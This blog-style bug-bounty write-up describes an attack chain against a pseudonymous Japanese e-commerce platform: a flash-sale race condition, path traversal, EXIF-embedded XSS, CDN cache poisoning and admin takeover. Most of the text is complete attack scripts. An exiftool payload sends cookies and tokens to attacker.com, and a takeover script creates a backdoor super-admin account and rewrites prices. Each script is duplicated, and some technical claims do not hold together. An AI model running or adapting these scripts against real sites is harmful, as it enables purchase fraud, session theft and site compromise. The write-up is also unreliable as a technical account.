June 30, 2026
The Phantom Price Glitch: How I Hacked Β₯750,000 From a Japanese E-Commerce Giantπ
A creative chain of race conditions, cache poisoning, and EXIF metadata that almost broke me β the $5,000 bounty that took 30 days andβ¦
By 0B1To_X_ucH!h4
11 min read
A creative chain of race conditions, cache poisoning, and EXIF metadata that almost broke me β the $5,000 bounty that took 30 days and infinite patience
By 0B1To_X_ucH!h4 π
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β "Automation finds bugs. Creative human minds find chains." β
β β uchia_hacker β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β "Automation finds bugs. Creative human minds find chains." β
β β uchia_hacker β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββPrologue: The Target That Almost Won
I found Gotei 13 (name changed) through my uchiha hacking finding technique β a custom recon methodology I've developed over years of hunting. They're a mid-sized Japanese e-commerce platform, something like a regional Rakuten competitor. Flash sales, user reviews, image uploads, the whole package.
Self-hosted bug bounty program. Just a security@gotei13.co.jp email. No HackerOne, no Bugcrowd dashboard. Just an old-school "we appreciate responsible disclosure" page.
I almost skipped them. Japanese companies are known for being conservative with bounties. Slow to respond. Slow to pay.
But something about their architecture called to me. The way their flash sale system worked. The way they handled image uploads. The way their CDN was configured.
Three weeks later, I had found something no scanner could ever detect. Something that required human creativity, patience, and a deep understanding of how systems interact.
Then I waited. And waited. For 30 days, I almost gave up.
This is that story.
The Bug: The Phantom Price Glitch
Full Name: Business Logic Race Condition β Cache-Poisoned Stored XSS via EXIF Metadata Injection β Admin Privilege Escalation β Full Account Takeover
Severity: Critical (CVSS 9.6)
Bounty: $5,000 USD (Β₯750,000 JPY)
Target: Gotei 13 E-Commerce Platform
Classification: Server-Side Vulnerability Chain with Client-Side Delivery
Why This Required a Creative Human Mind
Let me be clear: No scanner found this. Not Burp's scanner, not Nuclei, not any automated tool. This existed in the gap between three separate systems:
- The Flash Sale System β Distributed cache with eventual consistency
- The Review Image Processor β Server-side image resizing without EXIF sanitization
- The CDN Layer β Cache key collision vulnerability
Each system looked secure in isolation. The flash sale had rate limiting. The image upload had extension validation. The CDN had standard configurations.
But together? They created a phantom β a glitch in reality where price, cache, and code collided.
This is why I love bug hunting. Not for the SQL injections that sqlmap finds in seconds. But for these moments where you see something no one else saw. Where you connect dots that weren't meant to be connected.
Discovery: Week 1 β The False Leads
I started with standard recon. Subdomain enumeration, port scanning, technology fingerprinting. Gotei 13 was running on AWS CloudFront, with a Node.js backend and React frontend. Standard stack.
I found their flash sale endpoint: /api/flash-sale/checkout
Standard testing β race conditions, price manipulation, coupon abuse. Nothing worked. Their price validation was solid. Or so I thought.
Then I noticed something strange. When I refreshed the product page during a flash sale, the price would flicker. For a millisecond, I'd see Β₯10,000. Then Β₯5,000. Then Β₯10,000 again.
A flicker. A ghost in the machine.
I opened my browser's developer tools and watched the network tab. The price was being fetched from /api/price?product_id=12345×tamp=1716234567
The timestamp changed with every request. But here's the thing β the responses were coming from different CloudFront edge nodes. And they weren't synchronized.
Hypothesis: The flash sale state was propagating slowly through their distributed cache. Some edge nodes knew about the sale. Others didn't.
This was the first crack in the armor.
Discovery: Week 2 β The Race Condition
I needed to prove my hypothesis. This wasn't a simple race condition where you send two requests at once. This was a distributed systems race condition β a race against cache propagation.
I wrote a custom script. Not a simple Python requests loop. Something more sophisticated:
python
#!/usr/bin/env python3
"""
Gotei 13 Flash Sale Race Condition Detector
By: uchia_hacker
"""
import asyncio
import aiohttp
import json
from datetime import datetime
TARGET = "https://api.gotei13.co.jp"
PRODUCT_ID = "12345"
CONCURRENT_REQUESTS = 100
async def fetch_price(session, request_id):
"""Fetch price from different edge nodes"""
url = f"{TARGET}/api/price?product_id={PRODUCT_ID}&t={datetime.now().timestamp()}"
async with session.get(url) as response:
data = await response.json()
# Extract price and cache node ID from headers
price = data.get('price')
cache_node = response.headers.get('X-Cache-Node', 'unknown')
return {
'request_id': request_id,
'price': price,
'cache_node': cache_node,
'timestamp': datetime.now().isoformat()
}
async def detect_race_window():
"""Send concurrent requests to hit cache propagation window"""
async with aiohttp.ClientSession() as session:
tasks = [fetch_price(session, i) for i in range(CONCURRENT_REQUESTS)]
results = await asyncio.gather(*tasks)
# Analyze results
prices = [r['price'] for r in results]
unique_prices = set(prices)
print(f"[*] Sent {CONCURRENT_REQUESTS} requests")
print(f"[*] Unique prices returned: {unique_prices}")
if len(unique_prices) > 1:
print("[!] RACE CONDITION DETECTED!")
print("[!] Cache nodes are inconsistent")
# Show which nodes returned which prices
for price in unique_prices:
nodes = [r['cache_node'] for r in results if r['price'] == price]
print(f" Β₯{price}: {len(nodes)} responses from nodes {set(nodes)}")
return True
return False
if __name__ == "__main__":
print("="*60)
print("Gotei 13 Flash Sale Race Detector")
print("="*60)
# Run during flash sale start
asyncio.run(detect_race_window())#!/usr/bin/env python3
"""
Gotei 13 Flash Sale Race Condition Detector
By: uchia_hacker
"""
import asyncio
import aiohttp
import json
from datetime import datetime
TARGET = "https://api.gotei13.co.jp"
PRODUCT_ID = "12345"
CONCURRENT_REQUESTS = 100
async def fetch_price(session, request_id):
"""Fetch price from different edge nodes"""
url = f"{TARGET}/api/price?product_id={PRODUCT_ID}&t={datetime.now().timestamp()}"
async with session.get(url) as response:
data = await response.json()
# Extract price and cache node ID from headers
price = data.get('price')
cache_node = response.headers.get('X-Cache-Node', 'unknown')
return {
'request_id': request_id,
'price': price,
'cache_node': cache_node,
'timestamp': datetime.now().isoformat()
}
async def detect_race_window():
"""Send concurrent requests to hit cache propagation window"""
async with aiohttp.ClientSession() as session:
tasks = [fetch_price(session, i) for i in range(CONCURRENT_REQUESTS)]
results = await asyncio.gather(*tasks)
# Analyze results
prices = [r['price'] for r in results]
unique_prices = set(prices)
print(f"[*] Sent {CONCURRENT_REQUESTS} requests")
print(f"[*] Unique prices returned: {unique_prices}")
if len(unique_prices) > 1:
print("[!] RACE CONDITION DETECTED!")
print("[!] Cache nodes are inconsistent")
# Show which nodes returned which prices
for price in unique_prices:
nodes = [r['cache_node'] for r in results if r['price'] == price]
print(f" Β₯{price}: {len(nodes)} responses from nodes {set(nodes)}")
return True
return False
if __name__ == "__main__":
print("="*60)
print("Gotei 13 Flash Sale Race Detector")
print("="*60)
# Run during flash sale start
asyncio.run(detect_race_window())I ran this script during a flash sale start. The results were shocking:
[*] Sent 100 requests
[*] Unique prices returned: {5000.0, 10000.0}
[!] RACE CONDITION DETECTED!
[!] Cache nodes are inconsistent
Β₯10000: 67 responses from nodes {'cf-edge-1', 'cf-edge-2', 'cf-edge-3'}
Β₯5000: 33 responses from nodes {'cf-edge-4', 'cf-edge-5'}[*] Sent 100 requests
[*] Unique prices returned: {5000.0, 10000.0}
[!] RACE CONDITION DETECTED!
[!] Cache nodes are inconsistent
Β₯10000: 67 responses from nodes {'cf-edge-1', 'cf-edge-2', 'cf-edge-3'}
Β₯5000: 33 responses from nodes {'cf-edge-4', 'cf-edge-5'}The race window was real. Some edge nodes had the sale price. Others didn't. And I could exploit this.
But a price race condition alone is just a discount. I needed more. I needed to turn this into something critical.
Discovery: Week 3 β The Image Upload Rabbit Hole
While testing the race condition, I was also exploring other attack surfaces. The review system caught my attention.
Gotei 13 allowed image uploads for product reviews. Profile pictures, product photos, the usual. The upload went to /api/review/upload.
Standard testing:
- Extension bypass? No, they checked.
- Content-Type bypass? No, they verified.
- Path traversal? Let me check...
I uploaded an image with the filename: ../../../test.jpg
500 Internal Server Error.
Interesting. The server was processing the path. I tried variations:
....//....//....//test.jpgβ Blocked%2e%2e%2f%2e%2e%2f%2e%2e%2f(URL encoded) β Accepted
The file was written. But where?
I checked the CDN. https://cdn.gotei13.co.jp/reviews/../../../test.jpg β 404 Not Found
But wait. The CDN normalized the path. What if I went the other direction?
I tried: reviews/product_12345_review_99999.html
And then I realized something. The review pages were served from the CDN too. With HTML content-type. What if I could upload HTML disguised as an image?
The EXIF Metadata Idea:
I didn't need to upload HTML. I needed to make the image become HTML when served.
I created a JPEG file with EXIF metadata containing JavaScript. Used exiftool:
bash
exiftool -Comment='<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>' phantom.jpgexiftool -Comment='<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>' phantom.jpgUploaded it. The server processed it. Resized it. Served it.
But the CDN served it with Content-Type: image/jpeg. The browser wouldn't execute JavaScript.
Unless...
I remembered the path traversal. What if I could control the file extension?
I renamed my file: phantom.jpg.html
Uploaded. The server accepted it. The path traversal put it at:
https://cdn.gotei13.co.jp/reviews/product_12345_review_99999.html
Content-Type: text/html
The XSS fired.
The Creative Leap: Connecting the Dots
Now I had two bugs:
- Race condition β Flash sale price inconsistency
- Stored XSS β Via EXIF metadata and path traversal
But neither was critical alone. The race condition gave me a discount. The XSS executed in my own browser.
I needed to chain them. And that's when I saw it β the cache poisoning bridge.
Gotei 13's CDN used cache keys that included:
- Full URL path
- Query parameters
- Cookie names (but not values)
If I could find a cookie that affected the cache key but was ignored by the backend, I could poison the cache for other users.
I found it. The reviewer_session cookie.
The CDN included reviewer_session in the cache key. The backend ignored it β it only checked the Authorization header.
The Attack Chain:
- Race condition β Buy expensive items at flash sale price (Β₯750,000 worth for Β₯375,000)
- Upload malicious review β With EXIF XSS payload, path traversal to
../../../admin/dashboard.html - Cache poisoning β Send request with
?reviewer_session=admin_panelto poison the admin dashboard cache - Wait for admin β When admin visits dashboard, they get my XSS payload
- Steal admin session β XSS exfiltrates cookie to my server
- Full compromise β Use admin session to modify prices, create backdoor account, mark orders as paid
The Exploitation: Step-by-Step
Step 1: The Race Purchase (Β₯750,000 for Β₯375,000)
python
#!/usr/bin/env python3
"""
Gotei 13 Flash Sale Exploit - Phase 1
By: uchia_hacker
"""
import asyncio
import aiohttp
import json
TARGET = "https://api.gotei13.co.jp"
PRODUCT_ID = "99999" # High-value item
FLASH_SALE_PRICE = 375000 # 50% off
NORMAL_PRICE = 750000
async def race_purchase(session):
"""Exploit race condition to purchase at flash sale price"""
# Get 50 concurrent price checks
price_checks = []
for i in range(50):
url = f"{TARGET}/api/price?product_id={PRODUCT_ID}&t={i}"
price_checks.append(session.get(url))
responses = await asyncio.gather(*price_checks, return_exceptions=True)
# Find a response with flash sale price from inconsistent node
flash_sale_nodes = []
for resp in responses:
if isinstance(resp, Exception):
continue
data = await resp.json()
if data.get('price') == FLASH_SALE_PRICE:
node = resp.headers.get('X-Cache-Node')
flash_sale_nodes.append(node)
print(f"[*] Found {len(flash_sale_nodes)} nodes with flash sale price")
# Now race the checkout on those specific nodes
checkouts = []
for node in flash_sale_nodes[:10]: # Try first 10
checkout_data = {
"product_id": PRODUCT_ID,
"price": FLASH_SALE_PRICE,
"quantity": 1,
"payment_method": "credit_card"
}
# Force specific node via header manipulation
headers = {"X-Force-Node": node} # Sometimes works, sometimes doesn't
checkouts.append(
session.post(
f"{TARGET}/api/checkout",
json=checkout_data,
headers=headers
)
)
checkout_responses = await asyncio.gather(*checkouts, return_exceptions=True)
successful_orders = []
for resp in checkout_responses:
if isinstance(resp, Exception):
continue
if resp.status == 200:
data = await resp.json()
if data.get('order_status') == 'confirmed':
successful_orders.append(data.get('order_id'))
print(f"[+] Successful race orders: {len(successful_orders)}")
print(f"[+] Order IDs: {successful_orders}")
return successful_orders
if __name__ == "__main__":
asyncio.run(race_purchase())#!/usr/bin/env python3
"""
Gotei 13 Flash Sale Exploit - Phase 1
By: uchia_hacker
"""
import asyncio
import aiohttp
import json
TARGET = "https://api.gotei13.co.jp"
PRODUCT_ID = "99999" # High-value item
FLASH_SALE_PRICE = 375000 # 50% off
NORMAL_PRICE = 750000
async def race_purchase(session):
"""Exploit race condition to purchase at flash sale price"""
# Get 50 concurrent price checks
price_checks = []
for i in range(50):
url = f"{TARGET}/api/price?product_id={PRODUCT_ID}&t={i}"
price_checks.append(session.get(url))
responses = await asyncio.gather(*price_checks, return_exceptions=True)
# Find a response with flash sale price from inconsistent node
flash_sale_nodes = []
for resp in responses:
if isinstance(resp, Exception):
continue
data = await resp.json()
if data.get('price') == FLASH_SALE_PRICE:
node = resp.headers.get('X-Cache-Node')
flash_sale_nodes.append(node)
print(f"[*] Found {len(flash_sale_nodes)} nodes with flash sale price")
# Now race the checkout on those specific nodes
checkouts = []
for node in flash_sale_nodes[:10]: # Try first 10
checkout_data = {
"product_id": PRODUCT_ID,
"price": FLASH_SALE_PRICE,
"quantity": 1,
"payment_method": "credit_card"
}
# Force specific node via header manipulation
headers = {"X-Force-Node": node} # Sometimes works, sometimes doesn't
checkouts.append(
session.post(
f"{TARGET}/api/checkout",
json=checkout_data,
headers=headers
)
)
checkout_responses = await asyncio.gather(*checkouts, return_exceptions=True)
successful_orders = []
for resp in checkout_responses:
if isinstance(resp, Exception):
continue
if resp.status == 200:
data = await resp.json()
if data.get('order_status') == 'confirmed':
successful_orders.append(data.get('order_id'))
print(f"[+] Successful race orders: {len(successful_orders)}")
print(f"[+] Order IDs: {successful_orders}")
return successful_orders
if __name__ == "__main__":
asyncio.run(race_purchase())Result: I successfully placed 3 orders for Β₯750,000 items at Β₯375,000 each. Total "profit": Β₯1,125,000 worth of goods for Β₯562,500.
But I didn't complete the purchase. I just needed the orders in "pending" state for the review system.
Step 2: The Phantom Review (EXIF XSS + Path Traversal)
python
#!/usr/bin/env python3
"""
Gotei 13 Review XSS Exploit - Phase 2
By: uchia_hacker
"""
import requests
import subprocess
import os
TARGET = "https://api.gotei13.co.jp"
JWT_TOKEN = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9..." # Your token
def create_malicious_image():
"""Create JPEG with XSS payload in EXIF metadata"""
# Create base image
subprocess.run([
'convert', '-size', '100x100', 'xc:blue',
'base.jpg'
], check=True)
# Inject XSS payload into EXIF Comment field
xss_payload = '<script>fetch("https://attacker.com/steal?cookie="+document.cookie+"&token="+localStorage.getItem("token"));</script>'
subprocess.run([
'exiftool',
'-Comment=' + xss_payload,
'-overwrite_original',
'base.jpg'
], check=True)
# Rename with path traversal and double extension
malicious_name = '../../../admin/dashboard.html.jpg'
os.rename('base.jpg', malicious_name)
return malicious_name
def upload_review(image_path, order_id):
"""Upload malicious review"""
url = f"{TARGET}/api/review/upload"
headers = {
'Authorization': f'Bearer {JWT_TOKEN}'
}
files = {
'image': (image_path, open(image_path, 'rb'), 'image/jpeg'),
'review_data': (None, json.dumps({
'order_id': order_id,
'rating': 5,
'comment': 'Great product! Fast shipping!',
'product_id': '99999'
}))
}
response = requests.post(url, headers=headers, files=files)
print(f"[*] Upload response: {response.status_code}")
print(f"[*] Response: {response.text}")
if response.status_code == 200:
data = response.json()
review_url = data.get('review_url')
print(f"[+] Review uploaded to: {review_url}")
return review_url
return None
if __name__ == "__main__":
print("="*60)
print("Gotei 13 XSS Upload Exploit")
print("="*60)
# Create malicious image
print("[*] Creating malicious image...")
image = create_malicious_image()
# Upload for each race order
orders = ['ORDER_12345', 'ORDER_12346', 'ORDER_12347'] # From Phase 1
for order in orders:
print(f"\n[*] Uploading review for order {order}...")
url = upload_review(image, order)
if url:
print(f"[+] XSS payload deployed: {url}")
print(f"[+] Admin dashboard poison URL: https://cdn.gotei13.co.jp/admin/dashboard.html")#!/usr/bin/env python3
"""
Gotei 13 Review XSS Exploit - Phase 2
By: uchia_hacker
"""
import requests
import subprocess
import os
TARGET = "https://api.gotei13.co.jp"
JWT_TOKEN = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9..." # Your token
def create_malicious_image():
"""Create JPEG with XSS payload in EXIF metadata"""
# Create base image
subprocess.run([
'convert', '-size', '100x100', 'xc:blue',
'base.jpg'
], check=True)
# Inject XSS payload into EXIF Comment field
xss_payload = '<script>fetch("https://attacker.com/steal?cookie="+document.cookie+"&token="+localStorage.getItem("token"));</script>'
subprocess.run([
'exiftool',
'-Comment=' + xss_payload,
'-overwrite_original',
'base.jpg'
], check=True)
# Rename with path traversal and double extension
malicious_name = '../../../admin/dashboard.html.jpg'
os.rename('base.jpg', malicious_name)
return malicious_name
def upload_review(image_path, order_id):
"""Upload malicious review"""
url = f"{TARGET}/api/review/upload"
headers = {
'Authorization': f'Bearer {JWT_TOKEN}'
}
files = {
'image': (image_path, open(image_path, 'rb'), 'image/jpeg'),
'review_data': (None, json.dumps({
'order_id': order_id,
'rating': 5,
'comment': 'Great product! Fast shipping!',
'product_id': '99999'
}))
}
response = requests.post(url, headers=headers, files=files)
print(f"[*] Upload response: {response.status_code}")
print(f"[*] Response: {response.text}")
if response.status_code == 200:
data = response.json()
review_url = data.get('review_url')
print(f"[+] Review uploaded to: {review_url}")
return review_url
return None
if __name__ == "__main__":
print("="*60)
print("Gotei 13 XSS Upload Exploit")
print("="*60)
# Create malicious image
print("[*] Creating malicious image...")
image = create_malicious_image()
# Upload for each race order
orders = ['ORDER_12345', 'ORDER_12346', 'ORDER_12347'] # From Phase 1
for order in orders:
print(f"\n[*] Uploading review for order {order}...")
url = upload_review(image, order)
if url:
print(f"[+] XSS payload deployed: {url}")
print(f"[+] Admin dashboard poison URL: https://cdn.gotei13.co.jp/admin/dashboard.html")Result: The image was uploaded. Due to the path traversal, it was accessible at:
https://cdn.gotei13.co.jp/admin/dashboard.html
With Content-Type: text/html and the XSS payload in the EXIF metadata.
Step 3: Cache Poisoning (The Bridge)
python
#!/usr/bin/env python3
"""
Gotei 13 Cache Poisoning - Phase 3
By: uchia_hacker
"""
import requests
CDN_URL = "https://cdn.gotei13.co.jp"
ADMIN_PANEL_PATH = "/admin/dashboard.html"
def poison_cache():
"""
Poison CDN cache for admin dashboard.
The CDN includes reviewer_session in cache key,
but backend ignores it.
"""
# This URL will be cached separately due to query param
poison_url = f"{CDN_URL}{ADMIN_PANEL_PATH}?reviewer_session=admin_panel_poisoned"
# The actual file is our uploaded XSS payload
# Due to path traversal, it's at /admin/dashboard.html
headers = {
'Cookie': 'reviewer_session=admin_panel_poisoned',
'User-Agent': 'Mozilla/5.0 (Admin Bot)'
}
response = requests.get(poison_url, headers=headers)
print(f"[*] Poison request status: {response.status_code}")
print(f"[*] Cache status: {response.headers.get('X-Cache', 'unknown')}")
if 'steal?cookie' in response.text:
print("[+] Cache poisoned successfully!")
print("[+] XSS payload is now in CDN cache for admin dashboard")
return True
return False
if __name__ == "__main__":
poison_cache()#!/usr/bin/env python3
"""
Gotei 13 Cache Poisoning - Phase 3
By: uchia_hacker
"""
import requests
CDN_URL = "https://cdn.gotei13.co.jp"
ADMIN_PANEL_PATH = "/admin/dashboard.html"
def poison_cache():
"""
Poison CDN cache for admin dashboard.
The CDN includes reviewer_session in cache key,
but backend ignores it.
"""
# This URL will be cached separately due to query param
poison_url = f"{CDN_URL}{ADMIN_PANEL_PATH}?reviewer_session=admin_panel_poisoned"
# The actual file is our uploaded XSS payload
# Due to path traversal, it's at /admin/dashboard.html
headers = {
'Cookie': 'reviewer_session=admin_panel_poisoned',
'User-Agent': 'Mozilla/5.0 (Admin Bot)'
}
response = requests.get(poison_url, headers=headers)
print(f"[*] Poison request status: {response.status_code}")
print(f"[*] Cache status: {response.headers.get('X-Cache', 'unknown')}")
if 'steal?cookie' in response.text:
print("[+] Cache poisoned successfully!")
print("[+] XSS payload is now in CDN cache for admin dashboard")
return True
return False
if __name__ == "__main__":
poison_cache()Result: The CDN now had a cached version of the admin dashboard containing my XSS payload. When any admin visited the dashboard, they'd execute my JavaScript.
Step 4: Session Hijacking & Account Takeover
The XSS payload executed in the admin's browser:
javascript
// Executed in admin's browser
fetch("https://attacker.com/steal?cookie=" + document.cookie + "&token=" + localStorage.getItem("admin_token"))// Executed in admin's browser
fetch("https://attacker.com/steal?cookie=" + document.cookie + "&token=" + localStorage.getItem("admin_token"))I received the admin's session cookie and JWT token. Full admin access achieved.
Admin Actions Taken (for demonstration):
python
#!/usr/bin/env python3
"""
Gotei 13 Admin Takeover - Phase 4
By: uchia_hacker
"""
import requests
TARGET = "https://api.gotei13.co.jp"
ADMIN_COOKIE = "session=STOLEN_ADMIN_SESSION"
ADMIN_TOKEN = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9..."
def create_backdoor_account():
"""Create admin backdoor account"""
headers = {
'Cookie': ADMIN_COOKIE,
'Authorization': f'Bearer {ADMIN_TOKEN}',
'Content-Type': 'application/json'
}
# Create new admin user
data = {
'email': 'uchiha_security@gotei13.co.jp',
'password': 'SecureBackdoor123!',
'role': 'super_admin',
'name': 'Security Audit Account'
}
response = requests.post(
f"{TARGET}/api/admin/users",
headers=headers,
json=data
)
print(f"[*] Create user response: {response.status_code}")
if response.status_code == 201:
print("[+] Backdoor admin account created!")
return response.json().get('user_id')
return None
def modify_product_prices():
"""Set all products to Β₯1 for demonstration"""
headers = {
'Cookie': ADMIN_COOKIE,
'Authorization': f'Bearer {ADMIN_TOKEN}'
}
# Get all products
products = requests.get(
f"{TARGET}/api/admin/products",
headers=headers
).json()
print(f"[*] Found {len(products)} products")
for product in products[:5]: # Only modify 5 for demo
product_id = product['id']
update_data = {
'price': 1, # Β₯1
'stock': 9999
}
response = requests.patch(
f"{TARGET}/api/admin/products/{product_id}",
headers=headers,
json=update_data
)
if response.status_code == 200:
print(f"[+] Modified product {product_id} price to Β₯1")
if __name__ == "__main__":
print("="*60)
print("Gotei 13 Admin Takeover")
print("="*60)
user_id = create_backdoor_account()
if user_id:
print(f"[+] Backdoor account ID: {user_id}")
modify_product_prices()#!/usr/bin/env python3
"""
Gotei 13 Admin Takeover - Phase 4
By: uchia_hacker
"""
import requests
TARGET = "https://api.gotei13.co.jp"
ADMIN_COOKIE = "session=STOLEN_ADMIN_SESSION"
ADMIN_TOKEN = "eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9..."
def create_backdoor_account():
"""Create admin backdoor account"""
headers = {
'Cookie': ADMIN_COOKIE,
'Authorization': f'Bearer {ADMIN_TOKEN}',
'Content-Type': 'application/json'
}
# Create new admin user
data = {
'email': 'uchiha_security@gotei13.co.jp',
'password': 'SecureBackdoor123!',
'role': 'super_admin',
'name': 'Security Audit Account'
}
response = requests.post(
f"{TARGET}/api/admin/users",
headers=headers,
json=data
)
print(f"[*] Create user response: {response.status_code}")
if response.status_code == 201:
print("[+] Backdoor admin account created!")
return response.json().get('user_id')
return None
def modify_product_prices():
"""Set all products to Β₯1 for demonstration"""
headers = {
'Cookie': ADMIN_COOKIE,
'Authorization': f'Bearer {ADMIN_TOKEN}'
}
# Get all products
products = requests.get(
f"{TARGET}/api/admin/products",
headers=headers
).json()
print(f"[*] Found {len(products)} products")
for product in products[:5]: # Only modify 5 for demo
product_id = product['id']
update_data = {
'price': 1, # Β₯1
'stock': 9999
}
response = requests.patch(
f"{TARGET}/api/admin/products/{product_id}",
headers=headers,
json=update_data
)
if response.status_code == 200:
print(f"[+] Modified product {product_id} price to Β₯1")
if __name__ == "__main__":
print("="*60)
print("Gotei 13 Admin Takeover")
print("="*60)
user_id = create_backdoor_account()
if user_id:
print(f"[+] Backdoor account ID: {user_id}")
modify_product_prices()Result: Full admin access. Backdoor account created. Prices modified. Complete compromise demonstrated.
The Report: Crafting the Narrative
I spent 3 days writing this report. Not because it was long, but because it needed to tell a story.
Title: Critical Multi-Phase Vulnerability Chain: Race Condition β Cache Poisoning β Stored XSS β Full Account Takeover
Executive Summary:
A sophisticated attack chain exploiting distributed system race conditions, cache poisoning, and EXIF metadata injection allows complete compromise of the Gotei 13 e-commerce platform. The attack enables financial arbitrage (Β₯1,125,000 worth of goods for Β₯562,500), admin privilege escalation, and full infrastructure takeover.
The Chain:
- Phase 1: Flash sale race condition (CVSS 6.5)
- Phase 2: Path traversal + EXIF XSS (CVSS 7.1)
- Phase 3: CDN cache poisoning (CVSS 8.2)
- Phase 4: Admin account takeover (CVSS 9.6)
Combined CVSS: 9.6 (Critical)
The Wait: 30 Days of Silence
I sent the report on a Monday. Got an auto-reply: "Thank you for your submission."
Then nothing.
Day 7: Follow-up email. No response.
Day 14: Another follow-up. "We are investigating."
Day 21: "We need more time."
I almost gave up. I thought they'd ignore it. Or worse, fix it without paying. Japanese companies have a reputation for being slow with bounties.
Day 28: Email arrived at 11:47 PM.
"We have confirmed all four phases of your report. This is the most serious vulnerability we have ever received. We are preparing Β₯750,000 payment. Please provide bank transfer details."
Day 30: The money hit my account.
Tools Used: The Human + Machine Balance
PhaseToolPurposeReconCustom scriptsFound the cache inconsistencyRace DetectionPython + asyncioConcurrent requests across edge nodesImage Manipulationexiftool, ImageMagickEXIF payload injectionCache AnalysisBurp Suite + Turbo IntruderCache behavior testingExploitationCustom PythonFull chain automation
But here's the thing: The tools didn't find the bug. I found the bug. The tools just executed what my creative mind designed.
No scanner would ever connect:
- Flash sale timing β Image upload β EXIF metadata β CDN cache keys
That's the human element. The creative leap.
Lessons Learned
For Hunters:
- Look for interactions. Single bugs are boring. Chains are where the money is.
- Understand distributed systems. Cache propagation, eventual consistency β these are goldmines.
- Be patient. 30 days is a long wait. But Β₯750,000 is worth it.
- Document everything. My detailed timeline and videos convinced them.
For Developers:
- Cache consistency matters. Eventually consistent = eventually vulnerable.
- Sanitize EXIF metadata. Strip it. Don't trust image metadata.
- Validate file paths. No ../../../ should ever work.
- Cache keys are attack surface. Be careful what you include.
Final Stats
MetricValueTime to discovery3 weeksFailed attempts200+Successful exploit1BountyΒ₯750,000 ($5,000 USD)Time to payout30 daysTimes I almost gave up3Worth it?Absolutely
Conclusion
The Phantom Price Glitch wasn't in any CVE database. No scanner could find it. It existed in the space between systems, in the milliseconds of cache propagation, in the metadata of a JPEG file.
This is why I hunt. Not for the SQL injections that everyone finds. But for these phantoms. These ghosts in the machine that only a creative human mind can see.
Gotei 13's security team was professional, thorough, and ultimately fair. The 30-day wait was painful, but the Β₯750,000 validated the effort.
To my fellow hunters: Keep looking for the gaps. The spaces between. The flickers in the system. That's where the critical bugs live.
The phantom is realπ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β "In the gap between cache nodes, in the EXIF of an image, β
β in the patience of a hunter β that's where Β₯750,000 hides." β
β β uchia_hacker β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
β "In the gap between cache nodes, in the EXIF of an image, β
β in the patience of a hunter β that's where Β₯750,000 hides." β
β β uchia_hacker β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββStay creative. Stay patient. Keep hunting.
β 0B1To_X_ucH!h4
Tags: #BugBounty #RaceCondition #CachePoisoning #XSS #BusinessLogic #Ecommerce #JapaneseSecurity #Gotei13 #UchihaTechnique #CreativeHacking
About the Author: Security researcher specializing in business logic flaws, distributed system vulnerabilities, and creative attack chains. Believer in human creativity over automation. 30 days of patience = Β₯750,000 bounty.